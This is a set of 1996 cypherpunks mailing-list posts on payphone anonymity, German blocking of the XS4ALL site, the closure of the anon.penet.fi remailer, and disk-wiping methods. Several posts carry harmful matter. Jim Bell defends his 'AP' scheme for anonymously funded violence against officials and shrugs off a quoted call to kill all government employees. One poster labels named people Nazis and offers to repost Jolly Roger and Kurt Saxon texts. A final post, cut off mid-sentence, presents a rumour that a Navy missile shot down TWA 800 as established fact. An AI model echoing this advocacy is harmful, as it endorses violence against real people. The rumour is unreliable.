Date: Sat, 7 Sep 1996 01:40:46 +0800
To: "<pstira@escape.com>
Subject: Anonymous phone calls (was: What is the EFF doing exactly?)
Message-ID: <9608068420.AA842029748@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


There is another spin possible on the reasons for replacement of pay phones with
credit card phones. In Canada all new credit card phones are also able to take
phone cards (which are anonymous).

Using a prepaid phone card permits full anonymity. But what it also permits is
metered local calls. This infrastructure would be more familiar to someone from
Europe where metered local calls are the norm. 

Paris make the change to phones that *only* take prepaid phone cards (thus fully
anonymous) obstensibly because people were breaking into phones for the money.
Prepaid phone cards avoid this.

James

Why should my long distance calling subsidize your local internet access? ;-)

----------
From:   "<pstira@escape.com>" <pstira@escape.com>
Sent:   Friday, September 06, 1996 9:54 AM
To:     unicorn@schloss.li
Cc:     vznuri@netcom.com; cypherpunks@toad.com
Subject:        Re: What is the EFF doing exactly? 

Not just DC and Chicago, I'm afraid.  If anyone around NYC noticed, there 
are less and less payphones, and all new ones installed, just about, are 
those yellow credit card phones.  Not all of them, but it's now one for 
one, at least.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Sat, 7 Sep 1996 02:29:18 +0800
To: cypherpunks@toad.com
Subject: FW: Anonymous phone calls (was: What is the EFF doing exa...
Message-ID: <9608068420.AA842032641@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Subject: FW: Anonymous phone calls (was: What is the EFF doing exactly?)


There is another spin possible on the reasons for replacement of pay phones with
credit card phones. In Canada all new credit card phones are also able to take
phone cards (which are anonymous).

Using a prepaid phone card permits full anonymity. But what it also permits is
metered local calls. This infrastructure would be more familiar to someone from
Europe where metered local calls are the norm. 

Paris made the change to phones that *only* take prepaid phone cards (thus fully
anonymous) obstensibly because people were breaking into phones for the money.
Prepaid phone cards avoid this as well as collection costs.

James

Why should my long distance calling subsidize your local internet access? ;-)

----------
From:   "<pstira@escape.com>" <pstira@escape.com>
Sent:   Friday, September 06, 1996 9:54 AM
To:     unicorn@schloss.li
Cc:     vznuri@netcom.com; cypherpunks@toad.com
Subject:        Re: What is the EFF doing exactly? 

Not just DC and Chicago, I'm afraid.  If anyone around NYC noticed, there 
are less and less payphones, and all new ones installed, just about, are 
those yellow credit card phones.  Not all of them, but it's now one for 
one, at least.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Fri, 6 Sep 1996 19:51:45 +0800
To: cypherpunks@toad.com
Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
Message-ID: <199609060818.KAA00428@xs2.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



Please forward:


Contact:        XS4ALL Internet BV (http://www.xs4all.nl)
                Postbus 1848
                1000BV Amsterdam
Fax:            +31-20-6274498
Email:          felipe@xs4all.nl


             * * * P R E S S   R E L E A S E * * *


GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL, WITH 3100 WEBPAGES


German internetproviders, joined in the Internet Content Taskforce
(ICTF), started censoring the Dutch website www.xs4all.nl, containing
3100 personal and commercial homepages. This act of censorship is
caused by the webpage of a magazine that is banned in Germany, Radikal
(http://www.xs4all.nl/ ~tank/radikal/).

A German prosecutor sent the following message to the ICTF 
(http://www.anwalt.de/ictf/p960901e.htm):

  "Under the following addresses in Internet:
  
       http://www.serve.com/spg/154/
       http://www.xs4all.nl/~tank/radikal//154/
  
  and using the link on page
  
       http://ourworld.compuserve.com/homepages/angela1/radilink.htm
  
  one can call up the entire edition of the pamphlet entitled radikal Nr.
  154". Parts of this pamphlet justify preliminary suspicion of promoting
  a terrorist organization under ' 129a, Par.3 of the German Criminal
  Code, public condoning of criminal activities penalizable under ' 140
  no.2 of the German Criminal Code and preliminary suspicion of inciting
  to criminal activity under ' 130a Par.1 of the German Criminal Code.
  The Public Prosecutor General at the Federal Court of Justice has
  therefore initiated a criminal investigatory procedure against the
  parties disseminating this pamphlet.
  
  You are herewith informed that you may possibly make yourself subject
  to criminal prosecution for aiding and abetting criminal activities if
  you continue to allow these pages to be called up via your access
  points and network crosspoints"
  

Providers in Germany are already blocking packets to and from the
host www.xs4all.nl. The 3100 websites on this server include the 
Kurdistan Information Network
(http://www.xs4all.nl/~tank/kurdish/htdocs/),
the very popular Internet Charts (http://www.xs4all.nl/~jojo/) and 
the world famous Chip Directory (http://www.xs4all.nl/~ganswijk/chipdir/).

XS4ALL has not received any request from the German Government regarding
the homepage of Radikal. Without any prior contact the German prosecutor
decided that the XS4ALL website needs to be blocked for German 
Internet Users. XS4ALL is awaiting legal advice, and will investigate
if legal procedures against the German government are possible.

Censorship on Internet usually has the opposite effect. Internetusers
consider it a sport to publish censored materials. Many users have already
published the Radikal website on other Internet hosts. Here are some of
the URL's:

     http://burn.ucsd.edu/%7Eats/RADIKAL/
     http://www.jca.or.jp/~taratta/mirror/radikal/
     http://www.serve.com/~spg/
     http://huizen.dds.nl/~radikal
     http://www.canucksoup.net/radikal/index.html
     http://www.ecn.org/radikal
     http://www.well.com/~declan/mirrors/
     http://www.connix.com/~harry/radikal/index.htm
     http://www.xs4all.nl/~tank/radikal/index.htm

Xs4all Internet will rotate the IP-numbering of the website www.xs4all.nl
to ensure that it's 3100 userpages will all remain available for any
internet-user.


<end>


--
 Felipe Rodriquez          -  XS4ALL Internet  - finger felipe@xs4all.nl
for 
 http://xs4all.nl/~felipe/ - Managing Director - pub pgp-key 1024/A07C02F9 

  pgp Key fingerprint = 32 36 C3 D9 02 42 79 C6 D1 9F 63 EB A7 30 8B 1A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flying insect killer <kadafi@netcom.com>
Date: Sat, 7 Sep 1996 05:07:48 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Anonymous phone calls (was: What is the EFF doing exactly?)
In-Reply-To: <199609061607.JAA00624@mail.pacifier.com>
Message-ID: <Pine.3.89.9609061008.A10444-0100000@netcom20>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 6 Sep 1996, jim bell wrote:

> At 10:08 AM 9/6/96 EST, jbugden@smtplink.alis.ca wrote:
> >There is another spin possible on the reasons for replacement of pay phones with
> >credit card phones. In Canada all new credit card phones are also able to take
> >phone cards (which are anonymous).
> 
> Don't be too sure about the "anonymity" of these cards.  You don't have to 
> give your name when you buy or use them, but assuming a large number of 
> phone calls (to, from different locations) can be associated together after 
> the fact, your name can probably be fairly easily obtained.
> Jim Bell
> jimbell@pacifier.com

And phone companys that offers phone cards keep track of every call that 
goes thru each card number. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 7 Sep 1996 02:38:34 +0800
To: cypherpunks@toad.com
Subject: Co$ Buys EFF
Message-ID: <199609061043.KAA16012@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, September 6, 1996, p. D2. 
 
 
   Behind an Internet Message Service's Close 
 
      Pressure From Church of Scientology Is Blamed for the 
      Shutdown. A Finnish judge says different rules apply to 
      E-mail. 
 
   By Peter H. Lewis 
 
 
   Pressure from the Church of Scientology International was 
   at least partly responsible for the recent shutdown of a 
   well-known Internet messaging service based in Helsinki, 
   according to the Finnish operator of the service. 
 
   The service, known by its Internet address, anon.penet.fi, 
   was used by hundreds of thousands of people worldwide to 
   send and receive electronic messages without divulging 
   their true identities. It was the best known of a small, 
   global network of special computers known as remailers, 
   whose legitimate users include political dissidents, people 
   with medical or drug ailments and others who want to 
   communicate anonymously. 
 
   Although previous news accounts had reported that the 
   service was shut down because of accusations that it was a 
   primary conduit for child pornography transmitted on the 
   Internet, police investigators in Helsinki dismissed those 
   accusations as groundless. 
 
   The real reason for terminating the service, according to 
   its founder and operator, Johan Helsingius, was a recent 
   Helsinki court ruling that ordered him to reveal the true 
   name of one of his system's users to the Church of 
   Scientology. The judge held that under Finland's current 
   telecommunications laws, Internet electronic mail does not 
   carry the same privacy protections enjoyed by postal mail 
   or telephone calls. 
 
   The church, which in recent years has been trying to 
   protect its copyrighted scriptures by trying to block their 
   dissemination over computer networks, said an unknown 
   person or persons had used the anon.penet.fi computer to 
   illegally publish copyrighted church documents on Usenet, 
   the global electronic bulletin board. 
 
   Mr. Helsingius, a 35-year-old computer networking expert, 
   has not yet revealed the name sought by the Scientologists, 
   and said he planned to appeal the court ruling. But he said 
   the court ruling opened the door for future subpoenas 
   seeking the real names of anon.penet.fi users, and that he 
   would rather close the system than spend all his time in 
   court. 
 
   Mr. Helsingius has operated anon.penet.fi for more than 3 
   years, handling over 7,000 messages a day. 
 
   "In a sense I've done my pioneer work and it is now up to 
   others to carry on," Mr. Helsingius said. 
 
   Helena Kobrin, a Church of Scientology official, said the 
   complaint against anon.penet.fi was just one of several 
   actions the church had taken against the operators of 
   remailer computers in Europe and the United States. She 
   said the church has five lawsuits pending in the United 
   States against remailer operators and users of remailers. 
 
   "We have actively been in communication with various 
   remailers about postings that have gone through their 
   systems," said Ms. Kobrin, general counsel for the 
   Religious Technology Center in Los Angeles, which is 
   responsible for protecting the copyrights and trade secrets 
   of unpublished Scientology scriptures. 
 
   Earlier this year, another remailer, known as hacktic.nl, 
   in the Netherlands, was shut down under pressure from the 
   Scientologists. 
 
   Unlike many other churches, the Church of Scientology, 
   founded nearly 40 years ago by the science fiction author 
   L. Ron Hubbard, regards its gospel as copyrighted material 
   and a trade secret. Several courts have upheld the validity 
   of the copyrights. 
 
   Foes and critics of the church have used the Internet to 
   publish the church documents, as well as other documents 
   the church contends were stolen from its computers. 
 
   The Religious Technology Center has also unsuccessfully 
   attempted to put a stop to the forum on Usenet,  
   alt.religion.scientology, where many of the copyrighted 
   documents are published. 
 
   A series of recent news articles in The Observer of London 
   among others had linked the anon.penet.fi computer to 
   accusations it was a conduit for child pornography. 
 
   Mr. Helsingius, who has denied that his system is a conduit 
   for child pornography, declined to speculate on the motives 
   of the accusers. The accusations of child pornography first 
   appeared several days after Mr. Helsingius declined to turn 
   over to the court the name sought by the Scientologists. 
 
   The Observer quoted Toby Tyler, identified as an adviser to 
   the Federal Bureau of Investigation, as saying 
   anon.penet.fi was the source for up to 90 percent of the 
   child pornography on the Internet. 
 
   But Richard P. (Toby) Tyler, a sergeant in the San 
   Bernardino, Calif., County Sheriff's Department who said 
   his involvement with the F.B.I. was minimal, said he was 
   misquoted by the newspaper. Mr. Tyler, who has investigated 
   pornography trafficking in cyberspace, said that most child 
   pornography on the Internet did not pass through remailers. 
   He did say, however, that of the small portion that does, 
   70 percent to 90 percent passes through anon.penet.fi. 
 
   "I think that's a shame," Sergeant Tyler said upon learning 
   that anon.penet.fi was closed. "I personally view its 
   closing as a loss of freedom. I did not like the abuse of 
   the remailer for child pornography, but I felt it served a 
   necessary political purpose in this world." 
 
   Ms. Kobrin of the Religious Technology Center said that 
   despite its legal actions, the Church of Scientology does 
   not oppose the operation of remailers, which are also known 
   as anonymous servers. 
 
   "We were not opposing the existence of his server," Ms. 
   Kobrin said. "We have no opposition to there being 
   anonymity for private, consensual communications. What we 
   oppose is using anonymous servers for the purpose of 
   permitting criminal or other unlawful acts. There has to be 
   responsibility and accountability." 
 
   [End] 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 7 Sep 1996 05:22:41 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: Race Bit: C
Message-ID: <199609061750.KAA06787@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:05 AM 9/6/96 +0000, jonathon wrote:
>On Thu, 5 Sep 1996, jim bell wrote:
>
>> The way I see it, the status quo doesn't come "pre-justified":  It needs 
>> just as much a defense as any other proposal.  Its main advantage is that it 
>> tends to be more understood that most hypotheticals, because it's been 
>
>More understood, and just more accepted, because alternatives
>are hard to conceive, and even harder to popularize, without
>lots of red liquid running in the streets?

Since red liquid running in the streets is generally so reviled, one of the 
things which mystifies me is why there aren't more simulation-type programs 
used to test out hypotheticals, for example a "SimEconomy."   For example, 
you'll occasionally hear about a media news organization gathering a dozen 
or so volunteers in a room, and asking them to solve a problem like "The 
Budget Deficit" or some such.   The result of their interplay is generally 
used to explain why these problems are hard to solve.

I, for one, would love to be able to program in an immediate 25%+ reduction 
in military spending (added to that a 5%/year cumulative cut after that for 
10+ years), a 5% cut then a cap on Socialist Insecurity, 5% per year 
(cumulative,for 10 years) of reduction in welfare, along with similarly 
substantial cuts/caps in Medicare and a few other features.  Obviously, a 
computer-based simulation wouldn't just blindly do the cuts, but would also 
estimate the secondary and tertiary effects of such cuts, for example 
spending in areas whose economies are traditionally dependant on defense 
programs, etc.  

I'm not saying that I think these changes would be _easy_, politically, but 
if the average citizen were made aware of how simple the changes were, he'd 
be less tolerant of special-interest politics.


>	On second thoughts, let's just terminate
>	with extreme prejudice, each and every individual
>	who has worked in any capacity for any part of any
>	government agency in the us -- regardless of whether it
>	was federal, state or local, and regardless of whether 
>	they were president, janitor, or clerk.
>	All people in the employ of government agencies are death-dealers.

I hope you don't expect me to argue with this  B^)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 7 Sep 1996 05:51:15 +0800
To: cypherpunks@toad.com
Subject: Anonymous Payphones Re: What is the EFF doing exactly?
Message-ID: <199609061807.OAA15460@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:31 AM 9/6/96 -0400, "<pstira@escape.com>" <pstira@escape.com> wrote:
>Not just DC and Chicago, I'm afraid.  If anyone around NYC noticed, there 
>are less and less payphones, and all new ones installed, just about, are 
>those yellow credit card phones.  

That's not a big problem - you can buy telephone credit cards,
anonymously, in your local convenience store.  Around here you've
got a choice of cards where the announcements are in Spanish and
the rates to call Mexico are cheap, cards that come in exact $20
from machines that don't give change, cards with pretty pictures
on the front, cards with advertising, etc., as well as cards that
are reusable and want some personal information about you to activate.

I don't blame phone companies in New York for using non-coin-phones,
especially non-monopoly phone companies.  Collecting and handling
coins is expensive, phones get vandalized to steal the coins,
it's harder to change your rates when you need to go to
each phone to do it, and people get annoyed at coin phones that charge
higher than Bell prices.  

What I do get annoyed about is that most pay phones won't accept calls,
they'll only initiate them.  This means that if you call somebody
from a pay phone who only has a beeper, or if you don't have a beeper,
you can't leave them a useful message to call you back.  Part of this
is done because of the Great Drug Hysteria, but I suspect part of it
is that pay phone companies don't make money receiving calls,
so they don't want to tie up their phones doing that; perhaps if
they charged money to receive calls as well as initiate them,
they'd be willing to receive calls?


Not all of them, but it's now one for 
>one, at least.
>
>=Millie=
>PS: i wrote a fiction book about this a few years ago -- i should have 
>published. People could've said i was the next nostradamus. :( 

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Sat, 7 Sep 1996 07:07:33 +0800
Subject: Re: [DREK] Neo-Nazis etc.
In-Reply-To: <199609061711.NAA05404@charon.gti.net>
Message-ID: <199609061843.LAA16712@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! : Try to keep in mind that "Nazis" aren't skinheads and other 
! : troublemakers exactly, which is to say, those are the first people 
! : Hitler got rid of when he came to power.
! : 
! : Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we 
! : know anyone like that?
! : 
! 
! Reminded me of the following:
! 
! 	"You think swastikas are cool.
! 	The real Nazis run your school;
! 	They're coaches, businessmen, and cops.
! 	In a real Fourth Reich, you'd be the first to go."

Tim May is the Nazi of this list, Mitch Kapor is the Nazi of EFF and
Bill Clinton is the Nazi of the USA.  Thank you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Sat, 7 Sep 1996 07:05:09 +0800
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <ae55ae08020210048be5@[207.167.93.63]>
Message-ID: <199609061850.LAA17248@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! At 8:18 AM 9/6/96, tank wrote:
! >Please forward:
! 
! >             * * * P R E S S   R E L E A S E * * *
! >
! >
! >GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL, WITH 3100 WEBPAGES
! >
! >
! >German internetproviders, joined in the Internet Content Taskforce
! >(ICTF), started censoring the Dutch website www.xs4all.nl, containing
! >3100 personal and commercial homepages. This act of censorship is
! >caused by the webpage of a magazine that is banned in Germany, Radikal
! >(http://www.xs4all.nl/ ~tank/radikal/).
! ...
! 
! Though my German friends will perhaps feel I am picking on them, this is
! not so (this week Germany is in the hot seat, last week it was
! Singapore....).
! 
! A Modest Proposal:
! 
! * as Germany is bent on blocking sites which carry this subversive
! pamphlet, "Radikal," let us mirror it on thousands of sites around the
! world.
! 
! * when the Germans went into Danmark and insisted Jews wear badges,
! ordinary citizens (and the Danish Royal Family, as I recall) also took to
! wearing these Star of David badges.
! 
! * wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now
! attached to so many pages were to be joined by a "Star of David"? This Star
! of David symbol could mean "We support freedom to read, and our site
! contains the "Radikal" publication which Germans are forbidden to access."
! 
! (I know nothing of how such symbolic campaigns are actually launched and
! managed, so I'm suggesting the hint of an idea. I do think mirroring the
! banned publication (_any_ banned publication, by _any_ government) on as
! many sites as possible is a Good Idea.)

Can someone post an uncensored copy here?  That's a good start.  I 
could repost Jolly Roger which I think I archived, or post
something from Kurt Saxon in de.soc and soc.culture.german for a 
good start!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Sat, 7 Sep 1996 05:06:57 +0800
To: Bruce Schneier <cypherpunks@toad.com
Subject: Re: What the NSA is patenting
Message-ID: <2.2.32.19960906165918.0073d060@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 01:26 AM 9/3/96 -0500, Bruce Schneier wrote:
>I just spent a pleasant hour or so searching a patent database for all
>patents assigned to the NSA.  There's some interesting stuff:
>
>	"Self-locking, tamper-evident package"
>	Method of retrieving documents that concern the same topic"
>
>Fifty-Four patents total.  (Used to be they just kept stuff secret; now
>they patent some of it.)  Attached is the most interesting thing I found: a
>patent on techniques for reading data off overwritten magnetic media.
>
>Bruce

[ Interesting patent deleted ]

This method implies that they have the ability to scan the entire platter
surface at resolution level that is basically atomic.

>From lots of experience gained from working with metalworking machinery, it
sounds like some of the old magnetic data might be leaving traces behind by
a process called "backlash".  It happens because machines don't realign
themselves precisely, unless the lead-in steps are repeated every time.  

A fairly simple demonstration of this can be found on most dot-matrix
printers.  They usually have a mode called "uni-directional" printing, where
the printhead puts dots on the paper only when travelling from
left-to-right.  This is used to improve the quality of a graphic image.
Print a simple pattern of repeating vertical bars (||||||) across the page
and down several lines with this mode turned off, and you'll probably notice
the lines tend to not line up perfectly.  Turn uni-directional printing on,
and watch the behavior of the printhead.  It will "home" itself to the far
left side before printing the next line of bars.  The bars will then be
lined up "better" than in the bi-directional print.

We should be able to use this feature to our advantage to write a "backlash-
enhanced" wipedisk driver.

The wipedisk utilities I've seen today primarily consist of repeatedly
writing a pattern such as 0x55555555, then 0xAAAAAAAA, then 0xFFFFFFFF, then
0x00000000.  While this will probably eradicate most of the traces of the
original data, it's all happening "unidirectionally" -- starting at the
first sector of the file,  write this data till all the sectors have been
overwritten.  

Given that the original data may have been written in reverse sector order,
or reverse cylinder motion order, or after a large cylinder change, the
wipedisk might still leave traces remaining on the disk.  Using the above
example of printing vertical bars, imagine having each line print three
times using the unidirectional mode, and randomly picking one line out of
the entire array to print bi-directionally.  It'll stand out like a sore
thumb.  That's what I think they're looking for with their data recovery method.

What would probably make for a more secure wipe utility would be to alter
the "head approach path" prior to making each of the passes described above.
So, before overwriting the sectors in order from 0 to EOF full of
0x55555555s, have the head move to the 0th cylinder first.  Before
overwriting the sectors in order from 0 to EOF with 0xAAAAAAAAs, have the
head move to the last cylinder beforehand.  Repeat for the 0xFFFFFFFF and
0x00000000 sectors, except overwrite the sectors in order from EOF to 0.

All this pre-writing motion could theoretically reduce the repeatability of
the drive head positioning arm as well as possibly hitting different
rotational sync  points, using the backlash effect to its fullest extent.

Of course, the biggest problem will be that of overcoming intelligent disk
controllers.  No self-respecting SCSI drive is going to voluntarily swing
the disk head around inefficiently, and I don't know enough about how IDE
works to say anything different about it.

I hope some hardware hacker who knows their low-level stuff will be able to
write a secure disk wiper.

John
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'36"N by 93^16'27"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 7 Sep 1996 07:12:08 +0800
To: cypherpunks@toad.com
Subject: Doing away with govt. people
Message-ID: <323077F5.4DF7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Gee, if we could just prosecute "the govt." under auspices of the
"three strikes" legislation:

Gehlen Deal                   MK/ULTRA
"That 'Bay of Pigs' thing"    ZR/RIFLE
Watergate                     MH/CHAOS
Iran/Contra                   Phoenix Program
BCCI/BNL                      COINTELPRO
INSLAW                        Waco, etc.

Just say "Three strikes and you're (what?)"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Sat, 7 Sep 1996 05:18:22 +0800
To: dthorn@gte.net (Dale Thorn)
Subject: Re: [NOISE] Neo-Nazis etc.
In-Reply-To: <322F9867.7FEF@gte.net>
Message-ID: <199609061711.NAA05404@charon.gti.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Dale Thorn wrote:
: 
: Try to keep in mind that "Nazis" aren't skinheads and other 
: troublemakers exactly, which is to say, those are the first people 
: Hitler got rid of when he came to power.
: 
: Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we 
: know anyone like that?
: 

Reminded me of the following:

	"You think swastikas are cool.
	The real Nazis run your school;
	They're coaches, businessmen, and cops.
	In a real Fourth Reich, you'd be the first to go."

				-- Dead Kennedys
					"Nazi Punks F*** Off"

mark

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMjBbCBz4pZwIaHjdAQFpFQf+IyNTMUhb446jVw2+GNTF6Fy1EzvNZMoz
8xm12TdfxNH9z66zvd0cpNoVC2r3HrRwadj4j43UuDsFsc+AzUDNm7cKjiqTzhDi
hY+M8colZUI+5qMEvYmgUHPZn008CPdr5slGxOEDe6Pj7jjwF1ePMXQfgpoa09ZJ
xJ2YNI20Xglt+4+S9bE+XY43y+YuPsKz7LqF9nyaM4ENsq1k8myt2xPvuKZSAVd/
B6Jgh3NUgiuSxBQDj1f1+12TAllW5Mp7HAq74SF4G0JcvXQmkrNh43fbPLLVVzch
vJC9KD3ldOoqPs6ykxdjtfR/T1iCaBRqcclhc34TnNTRBNU/j8YKJA==
=mHK8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 7 Sep 1996 08:10:39 +0800
To: cypherpunks@toad.com
Subject: Re: Subject: Re: Race Bit: C
Message-ID: <199609062013.NAA05932@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:31 PM 9/5/96 -0600, Anonymous wrote:
>>	If I understand you correctly, it is OK for a government to
>>	institute violence against the residents of the land it claims
>>	dominion over, but it is not acceptable for the inhabitants of
>>	that piece of land to respond in self defence.
>
>I will say this:
>
>No, government initiation of violence (such as in Waco, Ruby Ridge, etc.) is not OK,
>and AsPol initiation of violence is not either. This can lead into a long argument about
>just _when_ violence is initiated, where opinion is more important than fact, but IMO:
>
>Randy Weaver was not initiating violence.
>David Keresh was not initiating violence.
>Pot growers and smokers are not initiating violence.

No argument here...

> But
>Mr. Bell, if he follows through on his scheme, *will* be initiating violence. His scheme,
>while it can sound tempting (especially every April 15th!) has no guarantee that it will
>_only_ be used against the Lon Horiuchis of our government,


Life generally doesn't come equipped with any guarantees.  Some people 
object to private ownership of guns, on a similar theory that "there is no 
guarantee they won't be used against innocent people."  Others (most of 
us?), particularly libertarians challenge this, pointing out that it is the 
abuse of a right which should be punished, rather than curtailing a right 
simply because a small minority abuse it.  To the extent we believe the 
latter argument, we are accepting the idea that a "guarantee" is not necessary.

AP, ultimately, is a tool that can be used well or used badly.  I advocate 
using it well.

>in fact, it may be said it
>is not guaranteed to not be used against Mr. Bell himself, as many have joked.


Check out what I wrote at the end of AP part 7:

"Terror, too, because this system may just change almost EVERYTHING how we 
think about our current society, and even more for myself personally, the 
knowledge that there may some day be a large body of wealthy people who are 
thrown off their current positions of control of the world's governments, 
and the very-real possibility that they may look for a "villain" to blame 
for their downfall.  They will find one, in me, and at that time they will 
have the money and (thanks to me, at least partially) the means to see their 
revenge.  But I would not have published this essay if I had been unwilling 
to accept the risk."


Long before I started publicizing AP, I had made my decision.


> There are two roads to take in life, convincing and coercing others. 
> I think that the former is still possible, Mr. Bell and many others disagree.

In a quote attributed to Al Capone, he said something like, "You can get 
more with a kind word and a gun, than you can with a kind word alone."  
Capone was probably talking about offense, but the principle is even more 
applicable to _defense_:  If you have a gun, you can prevent somebody else 
from coercing you, and ensure that they have to CONVINCE you!   AP is like a 
gun which can be aimed at the agents of the majority, to prevent them from 
violating the rights of the minority.

> I worry that abuse of the very young
>and weak (for now) anonymity system for the purpose of initiating, rather than exposing,
>violence will lead to more government violence than we already have.

First, AP only "initiates"  if it is used against people who have not,
 themselves, initiated force or fraud.  I contend that while this is not 
impossible, it is improbable.  If you choose a target that "everyone" else 
agrees has initiated force, you'll only have to cough up a dollar, or a 
quarter, or even a dime and you'll all get your wish.  Randomly select a 
guiltless individual and you'll be the only one paying, not to mention the 
fact that you might  have trouble finding an AP organization that'll take 
your malicious donation. This translates into:  "They'll exist, but due to 
lack of competition they'll be able to insist on taking a healthy cut of 
their own."

In addition, if you attempt to use AP against somebody who already knows 
it's probably you (say, an ex business partner you just ripped off?), its 
anonymity won't be much use.


> Perhaps I am
>wrong and there is no hope; but if so, that means another revolution. 
Revolutions are
>very romantic sounding, to those who have not been in a war.

The whole point of crypto-anarchy is that revolutions are CHANGING.   Think 
of a revolution like an earthquake:  It's the sudden release of stress built 
up over years or decades.  In an earthquake, if that release could be spread 
out from the seconds or minute it normally takes, to hours or even days (or 
better yet, continuously) the amplitude would be far smaller and you 
probably wouldn't even notice it.  Likewise, politically, the only reason 
you get revolutions is because political leadership gets entrenched and 
resists change.  Even in democracy, which is supposed to facilitate changes, 
eventually the politicians learn to play one group off another, leading to 
the same kind of social stratification problems that even dictatorships have.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Fri, 6 Sep 1996 22:46:43 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: FWD: Another try to kill democracy
In-Reply-To: <Pine.SUN.3.91.960905081519.10506A-100000@eff.org>
Message-ID: <Pine.LNX.3.94.960906133935.26336B-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



September 6th, 14:00 CET, I can still access
the url via our ISP.

-stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 7 Sep 1996 08:53:26 +0800
To: cypherpunks@toad.com
Subject: TWA 800 - Friendly Fire?
Message-ID: <199609062048.NAA32689@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


The latest rumor.

The message came to me from a man who was Safety Chairman for the
Airline Pilots Association for many years and he is considered an
expert on safety.  He would not ever spread idle rumor.  In short,
he is usually quite certain before saying anything!


The following information about TWA Fight 800 was received this
afternoon:  (08-22-96 )

TWA flight 800 was shot down by a U.S. Navy guided missile ship
which was in area W-105.  W-105 is a Warning Area off the SouthEast
coast of Long Island and is used by the military for missile firing
and other military operations.

Guided missile ships travel all over the world defending the US
and they were conducting practice firings up over the top of a Navy
P-3 radar plane who was on a Southwest heading about over the top
of TWA 800.  Evidently the missile is suppose to go over the top
of the P-3 and the accuracy of the missile is being measured by
instrumentation in the P-3.

There was a USAir flight coming from the Southeast descending
towards Providence, RI that had been cleared to 21,000 feet and
the TWA 800 aircarft was restricted to 13,000 feet.  The air traffic
controller requested the USAir flight to turn on his landing lights
with the idea that TWA might see his lights and identify him.  At
that point, he would clear the TWA flight to continue his climb.

The P-3 was a non-beacon target (transponder OFF) flying southwest
in the controlled airspace almost over TWA 800 and made NO calls
to ATC.  After the explosion, he continued his flight to the west
and then called ATC and asked if they would like him to turn around
and assist with the "accident!"

You will remember that the first announcement about this accident
came from the Pentagon.  The spokesman mentioned that they were
sending the Navy to the crash site.  They immediately sent a Navy
Captain who was replaced the next day by an Admiral.  That Admiral
